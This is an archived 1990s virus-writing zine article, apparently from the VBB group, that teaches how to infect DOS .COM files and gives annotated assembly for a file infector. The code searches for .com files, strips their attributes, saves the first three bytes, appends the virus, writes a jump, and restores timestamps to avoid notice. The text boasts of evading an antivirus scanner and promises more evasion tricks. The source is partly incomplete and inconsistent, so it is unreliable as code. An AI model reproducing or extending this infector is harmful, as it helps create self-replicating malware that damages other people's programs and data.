Collection of Hack-Phreak Scene Programs

home *** CD-ROM | disk | FTP | other *** search

/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / CCTX0497.ZIP / VBBUPDT2.ZIP / VBB-4.ZIP / VBB-4.020 < prev next >

Wrap

Text File | 1997-01-03 | 10KB | 222 lines

VBB VBB VBB VBB VBB VBB VBB VBB VBB VBB VBB Directory Findy by Spider VBB VBB VBB VBB of VBB VBB VBB VBB VBB VBB VBB VBB VBB VBB VBB VBB Hi, I'm Spider, i'm new on VBB, and on this article I will talk about COM virus. Note that to understand what I will show, you MUST know assembly, and how COM files and virus works.. so, let's start of the beginning: How COM files work ~~~ ~~~ ~~~~~ ~~~~ All files are divided into segments, these segments are not in order and can be load in to any place of memory... the principal diference between a COM and EXE file is that on COM files, the segmente will always start at 100h! With this in mind, it will be very simples to write a COM virus. How COM virus work ~~~ ~~~ ~~~~~ ~~~~ Ok, what a virus will do is open the COM file and save the first 3 bytes, on the place of this 3 bytes, the virus will put a JMP to the end of the file and copy the rest of the virus to it... so, the virus will always run first! After do the job, the virus will restore the original 3 byte, and load again at 100h, so the file starts again without know that there is something wrong. A normal COM file is like this: 1 2 3 __________ ____________________ __________________ | | | | | | | | |__________|____________________|__________________| Number 1 - Begining of the COM file 2 - Middle of COM file 3 - End of COM file On most COM files, they are executed and loaded on this order, 1, 2, 3. When a virus infects a COM file, the COM file will look like this: 1 3 4 5 2 ___ ________ ____________________ __________________ _______________ | | | | | | |JMP| | | | VIRUS | |___|________|____________________|__________________|_______________| When finish the job the virus will replace the JMP("1") with the 3 bytes, and back control to the COM file! So a simple but good virus will do this: 1- Find a file to fuck 3- Save the atributes of the file 2- Turn all file's attributes to OFF(normal file) 3- Open the file for read/write 4- Save the date/time of the file 5- See if is already infect, if so, go to 8 6- No, save the first 3 bytes, and replace it with a JMP 7- Copy the rest of the virus to the end of the COM file 8- Close the file 9- Restore date/time/.... 10- Back control to the original program 11- End Now, let's take a look on a virus that will do exacly that: ;---------------------------------------------------------------------- ; The Simple routine to Search for a .COM File... ;---------------------------------------------------------------------- com_files db "*.com",0 ; Mask for COM files. mov ah, 4eh ; Point to a *.COM file... mov dx, com_files ; Mask for COM files. mov cx, 7 ; Any kind of file. int 21h ; cmp ax, 12h ; Found?!? je exit ; No, exit... jmp found_file ; Yes, FUCK IT!!! ; Instead of Exiting here you can make the Virus go and change dir and ; look for several other .com files else where... with the help of the ; path or simply searching for more <dir>... found_file: mov di, [si+file] ; DI points to the filename. push si ; add si, file ; SI points to filename... mov ax, offset 4300h ; Get file attributes. mov dx, si ; Filename in DX. int 21h mov file_attrib, cx ; Save file Attributes. file dw 0 ; Here is where we save the filename. ; Now we will disable all atributes of the COM file that the virus found mov ax, offset 4301h ; To set file attributes... mov cx, offset 0fffeh ; Set them to a normal File. mov dx, si ; Filename. int 21h ; mov ax, offset 3d02h ; Open File to Read/Write. mov dx, si ; ASCIIZ filename. int 21h ; jnb ok ; If file was open continue. jmp put_old_attrib ; Error happened restore ; old attribs and quit. ok: mov bx, ax ; mov ax, offset 5700h ; Get File Date & Time... int 21h ; mov old_time,cx ; Save old File Time. mov old_date,dx ; Save old File Date. old_time db 0 ; This is the variables that we old_date db 0 ; use to save the file's info. ; here we infect the file... but first we SAVE the first 3 bytes ; somewhere in our virus mov ah,3fh ; Read file. mov cx,3 ; Number of bytes to read. mov dx,first_3 ; Save bytes in the buffer. add dx,si ; Filename. int 21h ; cmp ax,3 ; Where 3 bytes read? jnz fix_file ; If not fix file like before and quit, first_3 equ $ ; The First three bytes of the original file! int 20h ; The virus is infected to. nop ; ; This moves the File pointer to the END of the file mov ax,offset 4202h ; mov cx,0 ; mov dx,0 ; int 21h ; mov cx,ax ; DX:AX is the FILESIZE! sub ax,3 ; Subtract three because of file pointer. add cx,offset c_len_y ; mov di,si ; sub di,offset c_len_x ; mov [di],cx ; Modifies the 2nd & 3rd bytes of program. ; The writes our virus to the file mov ah,40h ; mov cx,virlength ; Virus Length. mov dx,si ; File. sub dx,offset codelength ; Length of virus codes. int 21h ; cmp ax,offset virlength ; All bytes written? jnz fix_file ; If no fix file and quit. ;Moves the file pointer to the beginning of file and write the ;3 bytes JMP at the beginning of the file mov ax,offset 4200h ; mov cx,0 ; mov dx,0 ; int 21h ; mov ah,40h ; Write to file... mov cx,3 ; # of bytes to write... mov dx,si ; File name... add dx,jump ; Point to the new JMP statement. int 21h jump db 0e9h ; This is the JMP that will be put in the ; Begining of the file! ;Restore Old File Time & Date fix_file: mov dx,old_date ; Old File Date mov cx,old_time ; Old file Time... and cx,offset 0ffe0h ; Flat Attribs. mov ax,offset 5701h ; int 21h ; mov ah,3eh ; int 21h ; Close file... ; Here we'll restore the old file attributes... put_old_attrib: mov ax,offset 4301h ; mov cx,old_att ; Old File Attributes. mov dx,si ; Filename... int 21h ; ;----------------------------- EnD ------------------------------------- Anyhow that's it... Simple no? This source was also used in ParaSite ][ of Rocky Steady and is STILL undetectable to date with Scanv85. Note that this code have lot's of Errors checks, this is very good, but if your virus need to have a minimum size, it better don't use this checks. Remember that COM files can have only 64k! So create a test to know if your virus can fuck the file, because if the file have 60k, and the virus 5k, the virus will just crash file!! Anyhow theres still work to be done, like you must restore the old data file so it will jump to 100h and run the old file the virus was infected too! Remember to store them in the beginning and then restore them! Anyhow there's a few Variables to be put in like `VirLength' which you should know how to do that also the `CodeLength' that is the VIRUS codes ONLY not counting the Stacks. On next article, I will show a complete COM virus, and some others tricks to avoid detection by AV(Anti-Virus LAMER!!). Spider